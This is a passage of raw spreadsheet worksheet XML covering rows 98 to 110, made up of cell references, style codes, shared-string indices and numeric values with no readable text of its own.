        <v>10</v>
      </c>
      <c r="D98" s="45" t="s">
        <v>854</v>
      </c>
      <c r="E98" s="45" t="s">
        <v>855</v>
      </c>
      <c r="F98" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G98" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H98" s="46" t="s">
        <v>856</v>
      </c>
      <c r="I98" s="46" t="s">
        <v>465</v>
      </c>
      <c r="J98" s="46" t="s">
        <v>857</v>
      </c>
      <c r="K98" s="47">
        <v>1.0</v>
      </c>
      <c r="L98" s="47">
        <v>0.0</v>
      </c>
      <c r="M98" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N98" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O98" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P98" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q98" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R98" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S98" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T98" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U98" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V98" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W98" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X98" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y98" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z98" s="52">
        <v>2.0</v>
      </c>
      <c r="AA98" s="106">
        <v>2.0</v>
      </c>
      <c r="AB98" s="107" t="s">
        <v>82</v>
      </c>
      <c r="AC98" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD98" s="65" t="s">
        <v>858</v>
      </c>
      <c r="AE98" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF98" s="53" t="s">
        <v>859</v>
      </c>
      <c r="AG98" s="65" t="s">
        <v>860</v>
      </c>
      <c r="AH98" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI98" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ98" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK98" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL98" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="99" ht="153.75" customHeight="1">
      <c r="B99" s="44" t="s">
        <v>284</v>
      </c>
      <c r="C99" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D99" s="45" t="s">
        <v>861</v>
      </c>
      <c r="E99" s="45" t="s">
        <v>862</v>
      </c>
      <c r="F99" s="55" t="s">
        <v>863</v>
      </c>
      <c r="G99" s="45" t="s">
        <v>864</v>
      </c>
      <c r="H99" s="46" t="s">
        <v>865</v>
      </c>
      <c r="I99" s="46" t="s">
        <v>866</v>
      </c>
      <c r="J99" s="46" t="s">
        <v>867</v>
      </c>
      <c r="K99" s="47">
        <v>1.0</v>
      </c>
      <c r="L99" s="47">
        <v>0.0</v>
      </c>
      <c r="M99" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N99" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O99" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P99" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q99" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R99" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S99" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T99" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U99" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V99" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W99" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X99" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y99" s="52">
        <v>2002752.2002749</v>
      </c>
      <c r="Z99" s="52">
        <v>2.0</v>
      </c>
      <c r="AA99" s="52">
        <v>4.0</v>
      </c>
      <c r="AB99" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC99" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD99" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE99" s="65" t="s">
        <v>868</v>
      </c>
      <c r="AF99" s="53" t="s">
        <v>869</v>
      </c>
      <c r="AG99" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AH99" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI99" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ99" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK99" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL99" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="100" ht="153.75" customHeight="1">
      <c r="B100" s="44" t="s">
        <v>284</v>
      </c>
      <c r="C100" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D100" s="45" t="s">
        <v>870</v>
      </c>
      <c r="E100" s="45" t="s">
        <v>871</v>
      </c>
      <c r="F100" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G100" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H100" s="46" t="s">
        <v>872</v>
      </c>
      <c r="I100" s="46" t="s">
        <v>873</v>
      </c>
      <c r="J100" s="46" t="s">
        <v>874</v>
      </c>
      <c r="K100" s="47">
        <v>1.0</v>
      </c>
      <c r="L100" s="47">
        <v>0.0</v>
      </c>
      <c r="M100" s="48">
        <v>402.0</v>
      </c>
      <c r="N100" s="48">
        <v>1.0</v>
      </c>
      <c r="O100" s="48">
        <v>3.0</v>
      </c>
      <c r="P100" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q100" s="50">
        <v>402.0</v>
      </c>
      <c r="R100" s="50">
        <v>1.0</v>
      </c>
      <c r="S100" s="50">
        <v>3.0</v>
      </c>
      <c r="T100" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U100" s="51">
        <v>402.50447</v>
      </c>
      <c r="V100" s="51">
        <v>2.0</v>
      </c>
      <c r="W100" s="51">
        <v>10.0</v>
      </c>
      <c r="X100" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y100" s="52" t="s">
        <v>875</v>
      </c>
      <c r="Z100" s="52">
        <v>8.0</v>
      </c>
      <c r="AA100" s="52">
        <v>24.0</v>
      </c>
      <c r="AB100" s="49" t="s">
        <v>626</v>
      </c>
      <c r="AC100" s="105" t="s">
        <v>212</v>
      </c>
      <c r="AD100" s="68" t="s">
        <v>876</v>
      </c>
      <c r="AE100" s="65" t="s">
        <v>877</v>
      </c>
      <c r="AF100" s="53" t="s">
        <v>878</v>
      </c>
      <c r="AG100" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH100" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI100" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ100" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK100" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL100" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="101" ht="153.75" customHeight="1">
      <c r="B101" s="44" t="s">
        <v>284</v>
      </c>
      <c r="C101" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D101" s="45" t="s">
        <v>879</v>
      </c>
      <c r="E101" s="45" t="s">
        <v>880</v>
      </c>
      <c r="F101" s="45" t="s">
        <v>881</v>
      </c>
      <c r="G101" s="45" t="s">
        <v>882</v>
      </c>
      <c r="H101" s="46" t="s">
        <v>883</v>
      </c>
      <c r="I101" s="46" t="s">
        <v>884</v>
      </c>
      <c r="J101" s="46" t="s">
        <v>885</v>
      </c>
      <c r="K101" s="47">
        <v>1.0</v>
      </c>
      <c r="L101" s="47">
        <v>0.0</v>
      </c>
      <c r="M101" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N101" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O101" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P101" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q101" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R101" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S101" s="50"/>
      <c r="T101" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U101" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V101" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W101" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X101" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y101" s="52">
        <v>2002752.2002749</v>
      </c>
      <c r="Z101" s="52">
        <v>2.0</v>
      </c>
      <c r="AA101" s="52">
        <v>2.0</v>
      </c>
      <c r="AB101" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC101" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD101" s="65" t="s">
        <v>886</v>
      </c>
      <c r="AE101" s="65" t="s">
        <v>887</v>
      </c>
      <c r="AF101" s="53" t="s">
        <v>888</v>
      </c>
      <c r="AG101" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH101" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI101" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ101" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK101" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL101" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="102" ht="153.75" customHeight="1">
      <c r="B102" s="44" t="s">
        <v>284</v>
      </c>
      <c r="C102" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D102" s="45" t="s">
        <v>879</v>
      </c>
      <c r="E102" s="45" t="s">
        <v>880</v>
      </c>
      <c r="F102" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G102" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H102" s="46" t="s">
        <v>889</v>
      </c>
      <c r="I102" s="46" t="s">
        <v>535</v>
      </c>
      <c r="J102" s="46" t="s">
        <v>890</v>
      </c>
      <c r="K102" s="47">
        <v>1.0</v>
      </c>
      <c r="L102" s="47">
        <v>0.0</v>
      </c>
      <c r="M102" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N102" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O102" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P102" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q102" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R102" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S102" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T102" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U102" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V102" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W102" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X102" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y102" s="52" t="s">
        <v>891</v>
      </c>
      <c r="Z102" s="52">
        <v>3.0</v>
      </c>
      <c r="AA102" s="52">
        <v>6.0</v>
      </c>
      <c r="AB102" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC102" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD102" s="65" t="s">
        <v>892</v>
      </c>
      <c r="AE102" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF102" s="53" t="s">
        <v>893</v>
      </c>
      <c r="AG102" s="65" t="s">
        <v>894</v>
      </c>
      <c r="AH102" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI102" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ102" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK102" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL102" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="103" ht="153.75" customHeight="1">
      <c r="B103" s="44" t="s">
        <v>284</v>
      </c>
      <c r="C103" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D103" s="45" t="s">
        <v>895</v>
      </c>
      <c r="E103" s="45" t="s">
        <v>896</v>
      </c>
      <c r="F103" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G103" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H103" s="46" t="s">
        <v>897</v>
      </c>
      <c r="I103" s="46" t="s">
        <v>898</v>
      </c>
      <c r="J103" s="46" t="s">
        <v>899</v>
      </c>
      <c r="K103" s="47">
        <v>1.0</v>
      </c>
      <c r="L103" s="47">
        <v>0.0</v>
      </c>
      <c r="M103" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N103" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O103" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P103" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q103" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R103" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S103" s="50"/>
      <c r="T103" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U103" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V103" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W103" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X103" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y103" s="52">
        <v>2001117.2003195</v>
      </c>
      <c r="Z103" s="52">
        <v>2.0</v>
      </c>
      <c r="AA103" s="52">
        <v>109.0</v>
      </c>
      <c r="AB103" s="49">
        <v>2001117.0</v>
      </c>
      <c r="AC103" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD103" s="65" t="s">
        <v>900</v>
      </c>
      <c r="AE103" s="65" t="s">
        <v>901</v>
      </c>
      <c r="AF103" s="53" t="s">
        <v>902</v>
      </c>
      <c r="AG103" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH103" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI103" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ103" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK103" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL103" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="104" ht="153.75" customHeight="1">
      <c r="B104" s="44" t="s">
        <v>903</v>
      </c>
      <c r="C104" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D104" s="45" t="s">
        <v>904</v>
      </c>
      <c r="E104" s="45" t="s">
        <v>905</v>
      </c>
      <c r="F104" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G104" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H104" s="46" t="s">
        <v>906</v>
      </c>
      <c r="I104" s="46" t="s">
        <v>323</v>
      </c>
      <c r="J104" s="46" t="s">
        <v>907</v>
      </c>
      <c r="K104" s="47">
        <v>1.0</v>
      </c>
      <c r="L104" s="47">
        <v>0.0</v>
      </c>
      <c r="M104" s="108">
        <v>42944.0</v>
      </c>
      <c r="N104" s="48">
        <v>1.0</v>
      </c>
      <c r="O104" s="48">
        <v>1.0</v>
      </c>
      <c r="P104" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q104" s="59" t="s">
        <v>908</v>
      </c>
      <c r="R104" s="50">
        <v>5.0</v>
      </c>
      <c r="S104" s="50">
        <v>6.0</v>
      </c>
      <c r="T104" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U104" s="60" t="s">
        <v>909</v>
      </c>
      <c r="V104" s="51">
        <v>9.0</v>
      </c>
      <c r="W104" s="51">
        <v>14.0</v>
      </c>
      <c r="X104" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y104" s="57" t="s">
        <v>910</v>
      </c>
      <c r="Z104" s="52">
        <v>15.0</v>
      </c>
      <c r="AA104" s="52">
        <v>25.0</v>
      </c>
      <c r="AB104" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC104" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD104" s="65" t="s">
        <v>911</v>
      </c>
      <c r="AE104" s="65" t="s">
        <v>912</v>
      </c>
      <c r="AF104" s="53" t="s">
        <v>913</v>
      </c>
      <c r="AG104" s="46" t="s">
        <v>914</v>
      </c>
      <c r="AH104" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI104" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ104" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK104" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL104" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="105" ht="153.75" customHeight="1">
      <c r="B105" s="44" t="s">
        <v>903</v>
      </c>
      <c r="C105" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D105" s="45" t="s">
        <v>904</v>
      </c>
      <c r="E105" s="45" t="s">
        <v>905</v>
      </c>
      <c r="F105" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G105" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H105" s="46" t="s">
        <v>915</v>
      </c>
      <c r="I105" s="46" t="s">
        <v>916</v>
      </c>
      <c r="J105" s="46" t="s">
        <v>917</v>
      </c>
      <c r="K105" s="47">
        <v>1.0</v>
      </c>
      <c r="L105" s="47">
        <v>0.0</v>
      </c>
      <c r="M105" s="108" t="s">
        <v>10</v>
      </c>
      <c r="N105" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O105" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P105" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q105" s="59" t="s">
        <v>10</v>
      </c>
      <c r="R105" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S105" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T105" s="49" t="s">
        <v>351</v>
      </c>
      <c r="U105" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V105" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W105" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X105" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y105" s="52">
        <v>2002749.0</v>
      </c>
      <c r="Z105" s="52">
        <v>1.0</v>
      </c>
      <c r="AA105" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB105" s="49">
        <v>2002749.0</v>
      </c>
      <c r="AC105" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD105" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE105" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF105" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG105" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH105" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI105" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ105" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK105" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL105" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="106" ht="153.75" customHeight="1">
      <c r="B106" s="44" t="s">
        <v>903</v>
      </c>
      <c r="C106" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D106" s="45" t="s">
        <v>904</v>
      </c>
      <c r="E106" s="45" t="s">
        <v>905</v>
      </c>
      <c r="F106" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G106" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H106" s="46" t="s">
        <v>918</v>
      </c>
      <c r="I106" s="46" t="s">
        <v>323</v>
      </c>
      <c r="J106" s="46" t="s">
        <v>919</v>
      </c>
      <c r="K106" s="47">
        <v>1.0</v>
      </c>
      <c r="L106" s="47">
        <v>0.0</v>
      </c>
      <c r="M106" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N106" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O106" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P106" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q106" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R106" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S106" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T106" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U106" s="51" t="s">
        <v>920</v>
      </c>
      <c r="V106" s="51">
        <v>4.0</v>
      </c>
      <c r="W106" s="51">
        <v>5.0</v>
      </c>
      <c r="X106" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y106" s="52" t="s">
        <v>921</v>
      </c>
      <c r="Z106" s="52">
        <v>7.0</v>
      </c>
      <c r="AA106" s="52">
        <v>13.0</v>
      </c>
      <c r="AB106" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC106" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD106" s="65" t="s">
        <v>922</v>
      </c>
      <c r="AE106" s="65" t="s">
        <v>923</v>
      </c>
      <c r="AF106" s="53" t="s">
        <v>924</v>
      </c>
      <c r="AG106" s="46" t="s">
        <v>925</v>
      </c>
      <c r="AH106" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI106" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ106" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK106" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL106" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="107" ht="153.75" customHeight="1">
      <c r="B107" s="44" t="s">
        <v>903</v>
      </c>
      <c r="C107" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D107" s="45" t="s">
        <v>926</v>
      </c>
      <c r="E107" s="45" t="s">
        <v>927</v>
      </c>
      <c r="F107" s="45" t="s">
        <v>928</v>
      </c>
      <c r="G107" s="45" t="s">
        <v>929</v>
      </c>
      <c r="H107" s="46" t="s">
        <v>930</v>
      </c>
      <c r="I107" s="46" t="s">
        <v>931</v>
      </c>
      <c r="J107" s="46" t="s">
        <v>929</v>
      </c>
      <c r="K107" s="47">
        <v>1.0</v>
      </c>
      <c r="L107" s="47">
        <v>0.0</v>
      </c>
      <c r="M107" s="108">
        <v>1448.0</v>
      </c>
      <c r="N107" s="48">
        <v>1.0</v>
      </c>
      <c r="O107" s="48">
        <v>3.0</v>
      </c>
      <c r="P107" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q107" s="59">
        <v>1448.0</v>
      </c>
      <c r="R107" s="50">
        <v>1.0</v>
      </c>
      <c r="S107" s="50">
        <v>3.0</v>
      </c>
      <c r="T107" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U107" s="60">
        <v>1448.0</v>
      </c>
      <c r="V107" s="51">
        <v>1.0</v>
      </c>
      <c r="W107" s="51">
        <v>6.0</v>
      </c>
      <c r="X107" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y107" s="52" t="s">
        <v>932</v>
      </c>
      <c r="Z107" s="52">
        <v>4.0</v>
      </c>
      <c r="AA107" s="52">
        <v>23.0</v>
      </c>
      <c r="AB107" s="49" t="s">
        <v>103</v>
      </c>
      <c r="AC107" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD107" s="68" t="s">
        <v>933</v>
      </c>
      <c r="AE107" s="65" t="s">
        <v>934</v>
      </c>
      <c r="AF107" s="53" t="s">
        <v>935</v>
      </c>
      <c r="AG107" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH107" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI107" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ107" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK107" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL107" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="108" ht="153.75" customHeight="1">
      <c r="B108" s="44" t="s">
        <v>903</v>
      </c>
      <c r="C108" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D108" s="45" t="s">
        <v>936</v>
      </c>
      <c r="E108" s="45" t="s">
        <v>937</v>
      </c>
      <c r="F108" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G108" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H108" s="46" t="s">
        <v>938</v>
      </c>
      <c r="I108" s="46" t="s">
        <v>323</v>
      </c>
      <c r="J108" s="46" t="s">
        <v>939</v>
      </c>
      <c r="K108" s="47">
        <v>1.0</v>
      </c>
      <c r="L108" s="47">
        <v>0.0</v>
      </c>
      <c r="M108" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N108" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O108" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P108" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q108" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R108" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S108" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T108" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U108" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V108" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W108" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X108" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y108" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z108" s="52">
        <v>2.0</v>
      </c>
      <c r="AA108" s="52">
        <v>4.0</v>
      </c>
      <c r="AB108" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC108" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD108" s="68" t="s">
        <v>756</v>
      </c>
      <c r="AE108" s="65" t="s">
        <v>940</v>
      </c>
      <c r="AF108" s="53" t="s">
        <v>941</v>
      </c>
      <c r="AG108" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH108" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI108" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ108" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK108" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL108" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="109" ht="153.75" customHeight="1">
      <c r="B109" s="44" t="s">
        <v>903</v>
      </c>
      <c r="C109" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D109" s="45" t="s">
        <v>942</v>
      </c>
      <c r="E109" s="45" t="s">
        <v>943</v>
      </c>
      <c r="F109" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G109" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H109" s="46" t="s">
        <v>944</v>
      </c>
      <c r="I109" s="46" t="s">
        <v>945</v>
      </c>
      <c r="J109" s="46" t="s">
        <v>946</v>
      </c>
      <c r="K109" s="47">
        <v>1.0</v>
      </c>
      <c r="L109" s="47">
        <v>0.0</v>
      </c>
      <c r="M109" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N109" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O109" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P109" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q109" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R109" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S109" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T109" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U109" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V109" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W109" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X109" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y109" s="52" t="s">
        <v>104</v>
      </c>
      <c r="Z109" s="52">
        <v>3.0</v>
      </c>
      <c r="AA109" s="52">
        <v>7.0</v>
      </c>
      <c r="AB109" s="49" t="s">
        <v>104</v>
      </c>
      <c r="AC109" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD109" s="68" t="s">
        <v>947</v>
      </c>
      <c r="AE109" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF109" s="53" t="s">
        <v>948</v>
      </c>
      <c r="AG109" s="65" t="s">
        <v>949</v>
      </c>
      <c r="AH109" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI109" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ109" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK109" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL109" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="110" ht="153.75" customHeight="1">
      <c r="B110" s="44" t="s">
        <v>373</v>
      </c>
      <c r="C110" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D110" s="45" t="s">
        <v>950</v>
      </c>
      <c r="E110" s="45" t="s">
        <v>951</v>
      </c>
      <c r="F110" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G110" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H110" s="46" t="s">
        <v>952</v>
      </c>
      <c r="I110" s="46" t="s">
        <v>953</v>
      </c>
      <c r="J110" s="46" t="s">
        <v>954</v>
      </c>
      <c r="K110" s="47" t="s">
        <v>955</v>
      </c>
      <c r="L110" s="47">
        <v>0.0</v>
      </c>
      <c r="M110" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N110" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O110" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P110" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q110" s="50" t="s">
        <v>956</v>
      </c>
      <c r="R110" s="50">
        <v>111.0</v>
      </c>
      <c r="S110" s="50">
        <v>838.0</v>
      </c>
      <c r="T110" s="49" t="s">
        <v>55</v>
      </c>
      <c r="U110" s="51" t="s">
        <v>957</v>
      </c>
      <c r="V110" s="51">
        <v>114.0</v>
      </c>
      <c r="W110" s="51">
        <v>7133.0</v>
      </c>
      <c r="X110" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y110" s="52" t="s">
        <v>958</v>
      </c>
      <c r="Z110" s="52">
        <v>325.0</v>
      </c>
      <c r="AA110" s="52">
        <v>10440.0</v>
      </c>
      <c r="AB110" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC110" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD110" s="65" t="s">
        <v>959</v>
      </c>
      <c r="AE110" s="65" t="s">
        <v>10</v>
      </c>
